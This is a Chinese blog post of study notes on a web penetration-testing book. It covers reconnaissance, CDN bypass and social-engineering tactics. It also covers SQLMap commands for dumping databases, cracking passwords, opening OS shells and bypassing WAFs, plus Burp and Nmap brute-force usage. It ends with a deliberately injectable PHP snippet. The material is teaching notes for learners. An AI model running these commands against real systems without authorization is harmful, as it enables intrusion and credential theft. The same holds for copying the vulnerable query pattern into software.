<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/blog/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/blog/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/blog/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/blog/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web,渗透测试,">










<meta name="description" content="这是北交亲学长写的一本书，主要集中于Web渗透测试，由浅入深，正好是我当下需要的，500多页，感觉起码要一周多时间才能粗略看完。这篇文章只能算看书时候的笔记，偶尔有皮两下的时候，但大致还是忠于原书内容，希望想入门渗透测试的同学还是建议去翻原书，书里很多的图片、代码，我的笔记只有文字部分。">
<meta name="keywords" content="Web,渗透测试">
<meta property="og:type" content="article">
<meta property="og:title" content="Web安全渗透测试攻防指南（一）">
<meta property="og:url" content="https://catchmenow.gitee.io/blog/2020/01/10/21/index.html">
<meta property="og:site_name" content="ssilent&#39;s blog">
<meta property="og:description" content="这是北交亲学长写的一本书，主要集中于Web渗透测试，由浅入深，正好是我当下需要的，500多页，感觉起码要一周多时间才能粗略看完。这篇文章只能算看书时候的笔记，偶尔有皮两下的时候，但大致还是忠于原书内容，希望想入门渗透测试的同学还是建议去翻原书，书里很多的图片、代码，我的笔记只有文字部分。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-02-19T12:13:09.062Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Web安全渗透测试攻防指南（一）">
<meta name="twitter:description" content="这是北交亲学长写的一本书，主要集中于Web渗透测试，由浅入深，正好是我当下需要的，500多页，感觉起码要一周多时间才能粗略看完。这篇文章只能算看书时候的笔记，偶尔有皮两下的时候，但大致还是忠于原书内容，希望想入门渗透测试的同学还是建议去翻原书，书里很多的图片、代码，我的笔记只有文字部分。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/blog/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'ssilent'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://catchmenow.gitee.io/blog/2020/01/10/21/">





  <title>Web安全渗透测试攻防指南（一） | ssilent's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/Mitsushima0" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/blog/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ssilent's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/blog/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/blog/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/blog/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/blog/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://catchmenow.gitee.io/blog/blog/2020/01/10/21/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ssilent">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/blog/images/p2.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ssilent's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Web安全渗透测试攻防指南（一）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-01-10T18:38:19+08:00">
                2020-01-10
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/blog/2020/01/10/21/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/blog/2020/01/10/21/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  9.9k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  39
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这是北交亲学长写的一本书，主要集中于Web渗透测试，由浅入深，正好是我当下需要的，500多页，感觉起码要一周多时间才能粗略看完。这篇文章只能算看书时候的笔记，偶尔有皮两下的时候，但大致还是忠于原书内容，希望想入门渗透测试的同学还是建议去翻原书，书里很多的图片、代码，我的笔记只有文字部分。<a id="more"></a></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="收集域名信息"><a href="#收集域名信息" class="headerlink" title="收集域名信息"></a>收集域名信息</h3><ol>
<li><p>Whois查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whois sina.com <span class="comment">#主要邮箱、DNS服务器</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>备案信息查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www.beianbeian.com</span><br><span class="line">www.tianyancha.com</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="搜集敏感信息"><a href="#搜集敏感信息" class="headerlink" title="搜集敏感信息"></a>搜集敏感信息</h3><ol>
<li><p>Google社工</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">site:edu.cn intex:后台管理 <span class="comment">#查询后缀是edu.cn以及页面包含后台管理四字的网页</span></span><br></pre></td></tr></table></figure>
<p>其他语法：</p>
<p>| 关键字   | 说明                                             |<br>| ——– | ———————————————— |<br>| Site     | 域名                                             |<br>| Inurl    | URL存在关键字的网页                              |<br>| Intext   | 网页正文中的关键字                               |<br>| Filetype | 指定文件类型                                     |<br>| Intitle  | 网页标题中的关键字                               |<br>| Link     | link:baidu.com，表示所有和baidu.com做了链接的URL |<br>| Info     | 指定站点的一些基本信息                           |<br>| cache    | Google关于某些内容的缓存                         |</p>
<p>其他浏览器语法差不多</p>
</li>
<li><p>Burpsuite Repeater功能，可以获得一些Server类型、版本，PHP版本信息。或者在Github上寻找相关信息。</p>
</li>
</ol>
<h3 id="收集子域名"><a href="#收集子域名" class="headerlink" title="收集子域名"></a>收集子域名</h3><p>主域名防护比较好，可以从子域名入手</p>
<ol>
<li><p>子域名检测工具</p>
<p>Layer子域名挖掘机、subDomainBrute、Sublist3r</p>
</li>
<li><p>搜索引擎枚举</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">site:baidu.com</span><br></pre></td></tr></table></figure>
</li>
<li><p>第三方聚合应用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://dnsdumpster.com</span><br></pre></td></tr></table></figure>
</li>
<li><p>证书透明度公开日志枚举</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://crt.sh</span><br><span class="line">https://censys.io</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="收集端口信息"><a href="#收集端口信息" class="headerlink" title="收集端口信息"></a>收集端口信息</h3><p>Nmap、Masscan、ZMap、御剑高速TCp端口扫描工具</p>
<p>下面是一些常用端口</p>
<ul>
<li><p>文件共享端口</p>
<p>| 端口号   | 端口说明         | 攻击方向                         |<br>| ——– | —————- | ——————————– |<br>| 21/22/69 | Ftp/Tftp         | 允许匿名的上传、下载、爆破、嗅探 |<br>| 2049     | Nfs服务          | 配置不当                         |<br>| 139      | Samba服务        | 爆破、未授权访问、远程代码执行   |<br>| 389      | Ldap目录访问协议 | 注入、允许匿名访问、弱口令       |</p>
</li>
<li><p>远程连接端口</p>
<p>| 端口号 | 端口说明        | 攻击方向                              |<br>| —— | ————— | ————————————- |<br>| 22     | SSH远程连接     | 爆破、SSH隧道及内网代理转发、文件传输 |<br>| 23     | Telnet远程连接  | 爆破、嗅探、弱口令                    |<br>| 3389   | Rdp远程桌面连接 | Shift后门（win server2003以下）、爆破 |<br>| 5900   | VNC             | 弱口令                                |<br>| 5632   | PyAnywhere      | 抓密码、代码执行                      |</p>
</li>
<li><p>其他重要端口(实在有点多，反正书还在那里）</p>
<p>| 端口号      | 端口说明        | 攻击方向                              |<br>| ———– | ————— | ————————————- |<br>| 80/443/8080 | 常见Web服务端口 | Web攻击、爆破、对应服务器版本漏洞     |<br>| 3306        |                 | 注入、提权、爆破                      |<br>| 25          | Smtp邮件服务    | 邮件伪造                              |<br>| 53          | DNS域名系统     | 允许区域传送、DNS劫持、缓存投毒、欺骗 |</p>
</li>
</ul>
<h3 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h3><p>CMS指纹（Content Management System）整站系统或文章系统，包含种类：PHPWind、PHPCMS、ECShop、WordPress、Z-Blog、ASPCMS，快速识别CMS就是指纹识别。</p>
<p>工具：御剑Web指纹识别、WhatWeb、WebRobo、椰树、轻量Web指纹识别</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://whatweb.bugscaner.com/look/</span><br><span class="line">http://www.yunsee.cn/finger.html</span><br><span class="line">https://whatweb.net</span><br></pre></td></tr></table></figure>
<h3 id="寻找真实IP"><a href="#寻找真实IP" class="headerlink" title="寻找真实IP"></a>寻找真实IP</h3><p>一些网站因为有CDN（内容分发网络，一组工作在不同运营商之间的高速缓存服务器节点），域名ping到的服务器并非真正的目标服务器，只是离我们比较近的CDN服务器。</p>
<p>多ping几次就知道是否有CDN，或者利用网站17CE</p>
<p>如何绕过CDN</p>
<ul>
<li>内部邮箱系统，未经过CDN解析，查找邮件头中的邮件服务器域名IP。必须是他们自己的邮件服务器。</li>
<li>扫描网站测试文件，如phpinfo、test等</li>
<li>分站域名，ping二级域名</li>
<li>国外访问（国内CDN只对国内用户加速），通过国外在线代理网站<a href="https://asm.ca.com/en/ping.php" target="_blank" rel="noopener">App Synthetic Monitor</a></li>
<li>查询域名的解析记录，没用CDN时候的解析记录<a href="https://www.netcraft.com/" target="_blank" rel="noopener">NETCRAFT</a></li>
<li>用fiddler或burpsuite抓APP的请求</li>
<li>绕过CloudFlare CDN查找真实IP，<a href="http://www.crimeflare.us/cfs.html#box" target="_blank" rel="noopener">CloudFlare</a></li>
</ul>
<p>验证获取的IP，直接访问IP</p>
<h3 id="收集敏感目录文件"><a href="#收集敏感目录文件" class="headerlink" title="收集敏感目录文件"></a>收集敏感目录文件</h3><p>菜刀、冰蝎</p>
<h3 id="社会工程学"><a href="#社会工程学" class="headerlink" title="社会工程学"></a>社会工程学</h3><p>比如给目标公司邮箱发邮件，分析邮件头；用已有的信息，冒充目标人物要求客服人员重置密码，拿下域管理控制台，做域劫持。</p>
<p>利用已有的社工库，八仙过海各显神通。</p>
<h2 id="搭建渗透环境及实战"><a href="#搭建渗透环境及实战" class="headerlink" title="搭建渗透环境及实战"></a>搭建渗透环境及实战</h2><h3 id="Linux安装LANMP"><a href="#Linux安装LANMP" class="headerlink" title="Linux安装LANMP"></a>Linux安装LANMP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wget http://dl.wdlinux.cn/files/lanmp_v3.tar.gz</span><br><span class="line">tar zxvf lanmp_v3.tar.gz</span><br><span class="line">sh lanmp.sh</span><br><span class="line">sudo dpkg-reconfigure dash <span class="comment">#选no</span></span><br></pre></td></tr></table></figure>
<h3 id="dvwa"><a href="#dvwa" class="headerlink" title="dvwa"></a>dvwa</h3><h3 id="sqli-labs"><a href="#sqli-labs" class="headerlink" title="sqli-labs"></a>sqli-labs</h3><p>学习SQL注入的开源平台</p>
<h3 id="XSS测试平台"><a href="#XSS测试平台" class="headerlink" title="XSS测试平台"></a>XSS测试平台</h3><h2 id="常用渗透工具"><a href="#常用渗透工具" class="headerlink" title="常用渗透工具"></a>常用渗透工具</h2><h3 id="SQLMap"><a href="#SQLMap" class="headerlink" title="SQLMap"></a>SQLMap</h3><ul>
<li>基于bool类型的盲注，根据返回页面判断条件真假的注入</li>
<li>基于时间的盲注，根据条件语句查看时间延迟语句是否已经执行（即页面返回时间是否增加）判断</li>
<li>基于报错注入</li>
<li>联合查询注入，使用union的情况下注入</li>
<li>堆查询注入，同时执行多条语句的注入</li>
</ul>
<h4 id="SQLMap入门"><a href="#SQLMap入门" class="headerlink" title="SQLMap入门"></a>SQLMap入门</h4><p>判断是否有注入点以及相关信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://192.168.1.104/sql1/?id=11</span><br><span class="line">sqlmap -u <span class="string">"http://192.168.1.104/sql1/?id=11&amp;uid=2 "</span> <span class="comment">#注入点后面的参数大于等于2 </span></span><br><span class="line">sqlmap -r 1.txt <span class="comment">#从文件中注入，txt文件中式web数据包</span></span><br><span class="line">sqlmap -u http://192.168.104、sql1/？id=1 -D ddd  -T ttt -C ccc --dump <span class="comment">#ddd代表数据库名，ttt代表表名，ccc代表字段名</span></span><br><span class="line">sqlmap -u <span class="string">"http://192.168.1.104/sql1/?id=1"</span>——current-user <span class="comment">#查看当前用户账号</span></span><br><span class="line">sqlmap -u <span class="string">"http://192.168.1.104/sql1/?id=1"</span>——passwords <span class="comment">#如果当前用户有读取包含用户密码的权限，列出用户并尝试破解密码</span></span><br><span class="line">--current-db <span class="comment">#当前使用的数据库</span></span><br></pre></td></tr></table></figure>
<h4 id="SQLMap进阶"><a href="#SQLMap进阶" class="headerlink" title="SQLMap进阶"></a>SQLMap进阶</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">--level 5 <span class="comment">#探测等级，默认1，越高越慢，cookie在等级2时候就会测试</span></span><br><span class="line">--is-dba <span class="comment">#当前用户是否为管理权限</span></span><br><span class="line">--roles <span class="comment">#列出数据库管理员角色</span></span><br><span class="line">-U uuu <span class="comment">#查看要看的用户名</span></span><br><span class="line">--referer <span class="comment">#伪造HTTP的referer，如--referer http://www.baidu,com，等级3时候就会对referer注入。</span></span><br><span class="line">--sql-shell <span class="comment">#运行自定义的SQL语句，例如select * from users limit 5,10; //检索记录6-15</span></span><br><span class="line">--os-cmd --os-shell <span class="comment">#运行任意操作系统命令，前提--is-dba为true</span></span><br><span class="line">--file-read <span class="string">"ffff"</span> <span class="comment">#从数据库服务器中读取文件ffff</span></span><br><span class="line">--file-write “aaa” --file-dest “bbb” <span class="comment">#上传文件到数据库服务器中，把aaa上传到数据库服务器上为bbb</span></span><br><span class="line">--tamper “mmm” <span class="comment">#绕过Waf，mmm为脚本名，脚本主要由两个函数构成，dependencies声明脚本适用/不适用范围，def tamper(payload,**kwargs)。接收payload和**kwargs返回一个payload，比如转大写字符绕过</span></span><br><span class="line">--identify-waf <span class="comment">#检测安全防护</span></span><br><span class="line"><span class="comment">#常用tamper</span></span><br><span class="line">apostrophemask.py <span class="comment">#将引号转为utf-8</span></span><br><span class="line">base64encode.py <span class="comment">#替换base64编码</span></span><br><span class="line">multiplespaces.py <span class="comment">#围绕sql关键字添加多个空格</span></span><br><span class="line">space2plus.py <span class="comment">#用+代替空格</span></span><br><span class="line">......</span><br><span class="line"><span class="comment">#省略，翻书</span></span><br></pre></td></tr></table></figure>
<h3 id="BurpSuite"><a href="#BurpSuite" class="headerlink" title="BurpSuite"></a>BurpSuite</h3><h4 id="BurpSuite入门"><a href="#BurpSuite入门" class="headerlink" title="BurpSuite入门"></a>BurpSuite入门</h4><p>bs代理工具是以拦截代理的方式，拦截所有通过代理的网络流量，以中间人的方式对客户端的请求数据，服务端的返回信息做处理，以进行安全测试。</p>
<ol>
<li><p>Proxy</p>
<p>代理模式，Intercept选项卡，forward转发，drop丢掉当前拦截的数据包，action把数据包进一步转发给Spider、Scanner、Repeater、Intruder等组件，可能也会改变请求方式和body的编码方式</p>
</li>
<li><p>Burp scanner</p>
<ul>
<li>主动扫描，发送大量请求影响服务器性能，非生产环境使用，适用漏洞：<ul>
<li>客户端漏洞，XSS、HTTP头注入、操作重定向</li>
<li>服务端漏洞，SQL注入，命令行注入、文件遍历</li>
</ul>
</li>
<li>被动扫描，不会重新发送请求，易查漏洞：<ul>
<li>明文密码</li>
<li>cookie缺少HttpOnly和安全标志</li>
<li>cookie范围缺失</li>
<li>跨站脚本包含</li>
<li>表单自动填充</li>
<li>SSL保存的内容缓存</li>
<li>目录列表</li>
<li>提交密码后应答延迟</li>
<li>session令牌不安全传输</li>
<li>敏感信息泄露</li>
<li>ViewState配置不当</li>
<li>Content-Type指令不当</li>
</ul>
</li>
</ul>
</li>
<li><p>Intruder</p>
<p>定制的高度可配置工具，进行自动化攻击，如枚举用户名、ID和账户号码，模糊测试，SQL注入，跨站，目录遍历等</p>
<p>工作原理，修改各种参数获取不同应答，每次携带一个或多个payload。</p>
<p>步骤：</p>
<ul>
<li><p>先将数据send to Intruder，burp会对参数进行标记，清除先</p>
</li>
<li><p>选择要暴力破解的参数值，将pass参数选中，单击“Add $”，单一参数用sniper，多参数用cluster bomb模式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sniper使用单一的payload组</span><br><span class="line">Battering ram也使用单一payload组，适用于多个位置放相同输入</span><br><span class="line">Pitchfork使用多个payload组，适用于多个位置放不同输入</span><br><span class="line">cluster bomb用多个payload组，，适用于在位置中需要不同且不相关或未知输入攻击</span><br></pre></td></tr></table></figure>
</li>
<li><p>选择要添加的字典</p>
</li>
<li><p>start attack</p>
</li>
</ul>
</li>
<li><p>Repeater</p>
<p>手动修改、补发个别HTTP请求，并分析响应的工具。经常用repeater来进行请求与响应的消息验证分析，例如：修改请求参数、验证输入的漏洞；修改请求参数、验证逻辑越权；从拦截记录中，补获特征性的请求消息进行重放</p>
</li>
<li><p>Comparer</p>
<p>可视化差异对比功能，用于枚举用户名、Intruder攻击响应、SQL注入的盲注测试</p>
</li>
<li><p>Sequencer</p>
<p>分析数据样本随机性质量的工具，可测试session token、密码重置令牌是否可预测</p>
</li>
</ol>
<h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><p>用来快速扫描大型网络，主机探测和发现、开放端口情况、指纹识别、WAF识别及常见安全漏洞。</p>
<p>特性：</p>
<ul>
<li>主机探测</li>
<li>端口扫描</li>
<li>版本检测</li>
<li>系统检测</li>
<li>支持探测脚本的编写：nse格式，lua语言</li>
</ul>
<h4 id="Nmap入门"><a href="#Nmap入门" class="headerlink" title="Nmap入门"></a>Nmap入门</h4><p>太多了参数，下面是常用命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4-A-v 102.123.23.123 #-A进攻性方式扫描，-T4采用4级别进行扫描（0-5越高越快），-v详细模式</span><br><span class="line">nmap 192.168.0.100-110 #扫描连续网段</span><br><span class="line">nmap 192.168.0.100/24 #扫描192.168.0.1~192.168.0.255网段</span><br><span class="line">nmap -iL 1.txt #扫描文件中的地址</span><br><span class="line">nmap 192.168.0.100/24 -exclude 192.168.0.105 #排除一个IP</span><br><span class="line">nmap 192.168.0.100/24 -excludefile 1.txt #排除一个文件中IP</span><br><span class="line">nmap 192.168.1.199 -p 21,22,23,80 #扫描特殊端口</span><br><span class="line">nmap --traceroute 192.168.1.194 #对目标地址进行路由追踪</span><br><span class="line">nmap -sP 192.168.1.100/24 #检查目标地址C段在线状况</span><br><span class="line">nmap -O 192.169.0.103 #OS指纹识别</span><br><span class="line">nmap -sV 192.169.1.1 #开放端口对应的服务版本信息</span><br><span class="line">nmap -sF -T4 192.168.1.103 #探测防火墙状态</span><br></pre></td></tr></table></figure>
<p>识别状态：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">open #开放的</span><br><span class="line">filtered #被过滤的，表示端口被防火墙或其他网络设备阻止</span><br><span class="line">closed #未开启端口</span><br></pre></td></tr></table></figure>
<h4 id="Nmap进阶"><a href="#Nmap进阶" class="headerlink" title="Nmap进阶"></a>Nmap进阶</h4><p>提供很多脚本，主要有：绕过鉴权、在局域网内探查更多服务、暴力破解、已知漏洞入侵、模糊测试脚本、检查是否有常见漏洞</p>
<p>常用脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">-sC / --script=default #使用默认脚本</span><br><span class="line">--script=&lt;Lua scripts&gt;</span><br><span class="line">--script-args=key1=value1, key2=value2 #参数、值的键值对 </span><br><span class="line">--script-args-file=fiilename #用文件为脚本提供参数</span><br><span class="line">--script-trace #显示发送和接收的数据</span><br><span class="line">--script-updatedb #更新脚本所在数据库</span><br><span class="line">--script-help=&lt;lua scripts&gt;</span><br></pre></td></tr></table></figure>
<p>实例</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=auth 192.168.0.105 #进行弱口令检测</span><br><span class="line">nmap --script=brute 192.168.1.105 #暴力猜解简单密码</span><br><span class="line">nmap --script=vuln 192.168.0.104 #扫描常见漏洞</span><br><span class="line">nmap --script=realvnc-auth-bypath 192.168.0.104 #常见应用服务的扫描脚本，如VNC、Mysql、Telnet、Rsync，以VNC服务为例</span><br><span class="line">nmap -n -p 445 --script=broadcast 192.168.1.105 #局域网内探测服务开启状况</span><br><span class="line">nmap -script external sina.com #先用外部库解析域名，再扫描</span><br></pre></td></tr></table></figure>
<p><a href="https://nmap.org/nsedoc/categories" target="_blank" rel="noopener">扫描脚本使用方法</a></p>
<h2 id="Web安全原理"><a href="#Web安全原理" class="headerlink" title="Web安全原理"></a>Web安全原理</h2><h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><h4 id="SQL注入基础"><a href="#SQL注入基础" class="headerlink" title="SQL注入基础"></a>SQL注入基础</h4><p>满足以下条件：1. 参数用户可控 2. 传入参数拼接到sql语句</p>
<p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line">$id = $_GET[&apos;id&apos;];</span><br><span class="line">$get_id = &quot;select first_name, last_name from users where user_id = &apos;$id&apos;&quot;; #注入点</span><br><span class="line">$result = mysql_query($get_id) or die(&apos;&lt;pre&gt;&apos;,mysql_error().&apos;&lt;/pre&gt;&apos;);</span><br><span class="line">#这是一段有注入漏洞的php代码</span><br></pre></td></tr></table></figure>
<p>Mysql默认存在一个Information_schema的数据库，记住三个表名，SCHEMATA、TABLES和COLUMNS</p>
